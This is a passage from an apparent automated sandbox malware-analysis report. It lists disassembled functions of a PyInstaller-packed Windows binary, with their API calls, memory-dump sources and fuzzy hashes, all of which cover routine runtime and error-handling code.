                                                                                                                                                                                                                                          • Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                          • Instruction ID: b3dafb40df55a1660027b11f7531067e0e2004e04927585f42f1707e75534f3b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E721A423F3D24682FA547765665113D63425F487B0F4087B8D87EC76FADE2DB800A300
                                                                                                                                                                                                                                          Function 00007FF67AEF7DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                          • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                          • Instruction ID: f2c001754ce52c869f1f78d269904091fc8490a119545717540ad6e2a4d1ca74
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3119622738A4586F7909B56F85432A72A0FB88BE4F044278E99DC77B4DF3CD904CB40
                                                                                                                                                                                                                                          Function 00007FF67AED8560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF67AED9216), ref: 00007FF67AED8592
                                                                                                                                                                                                                                          • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED85E9
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF67AED45E4,00000000,00007FF67AED1985), ref: 00007FF67AED9439
                                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED8678
                                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED86E4
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED86F5
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,00000000,00007FF67AED9216), ref: 00007FF67AED870A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3462794448-0
                                                                                                                                                                                                                                          • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                          • Instruction ID: 9819618471a886dc4fa41f6e6b7f67562f5b703341253065479d7fed40770dea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C841CF63B2868245EA30BB22A5406AA63A4FFC4BD5F140175DF9CD7BE9DE3CE401D700
                                                                                                                                                                                                                                          Function 00007FF67AEEB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB347
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB37D
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3AA
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3BB
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3CC
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA,?,?,?,?,00007FF67AEE71FF), ref: 00007FF67AEEB3E7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                          • Instruction ID: 3ea4bef323f937b941fbc38cf24f40855ece8a63cd2bf493774a51f5250fe4b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B116023A3C68686FA547721A69213D63429F547B0F5487B4E87EC77F6EF7CA801A301
                                                                                                                                                                                                                                          Function 00007FF67AED2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF67AED1B6A), ref: 00007FF67AED295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                          • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                          • Instruction ID: 53645361959c1f61712c409df583daee2172ff76b51b76878582efcb6a787fd9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D831DF23B28A8156E720B761B8406EA6394BFC87D4F500136EE8DC7769EF3CD586D700
                                                                                                                                                                                                                                          Function 00007FF67AED2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                          • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                          • Instruction ID: 1717989dcef1fe0b0ce6d70bb1669abe5fa85ad4e4ca767f3c6169505f7406a5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E315E73628A8289EB60EB21F8552FA6360FF88784F544175EA4D8BB69DF3CD104D700
                                                                                                                                                                                                                                          Function 00007FF67AED2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF67AED918F,?,00007FF67AED3C55), ref: 00007FF67AED2BA0
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF67AED2C2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                          • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                          • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                          • Instruction ID: 22a8aeda325637f0f7a4286d6e2e49398fc0a6d64678d57fa4b50c052c19b07c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1121AE73B28B8186E751AB64F8447AA63A4EB887C0F404136EA8D97669DE3CD645C740
                                                                                                                                                                                                                                          Function 00007FF67AED2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF67AED1B99), ref: 00007FF67AED2760
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                          • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                          • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                          • Instruction ID: f42d368d94af0c0089e971c35a4c8b767c54bc6d587e7b9ea4957c78d539e5f5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B217C73A29B8186E660EB61B8817EA63A4EB883C4F400175EA8C97669DF3CD545DB40
                                                                                                                                                                                                                                          Function 00007FF67AEE9AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                          • Instruction ID: a67d9b6d7687c8864fc4872da8e96dc94bb806d9a0eff251c74822dc8b6b0ffa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7F0C222B29B0681FB509B20F85473A5360EF44761F4406B9DAAEC71F4DF2CD044E704
                                                                                                                                                                                                                                          Function 00007FF67AEF93D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction ID: bba2312b7da97a2eedaebef1015a100488629bdeb2adc4f0a40545f3c8225b86
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35118273E7CA1301F6E43528F4963791054EF79364E044ABCFAEE866F68E2C69416D44
                                                                                                                                                                                                                                          Function 00007FF67AEEB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB41F
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB43E
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB466
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB477
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF67AEEA613,?,?,00000000,00007FF67AEEA8AE,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEB488
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                          • Instruction ID: 1d917f13ee69e1b3a437342bec29457ba60b02bf815dc72084d3c3190bea1fdb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8114F23A3D64682FA58B725A55127963915F847B0F4483B4E97DC76F6EF2CA801A301
                                                                                                                                                                                                                                          Function 00007FF67AEEB294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                          • Instruction ID: 2611c3228e4e072f99ac7daf1c7310118be4910334ca85d52c2e44a4c44d2ef2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57113C23E3D24782F9587325546227E13414F59730F4887B8D97ECA2F2DE3DB801A301
                                                                                                                                                                                                                                          Function 00007FF67AEE6010 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: verbose
                                                                                                                                                                                                                                          • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                          • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                          • Instruction ID: b794151ac2e2be251bcb9b7728c8607c800a55adc27bdaa26b4fea030429d853
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
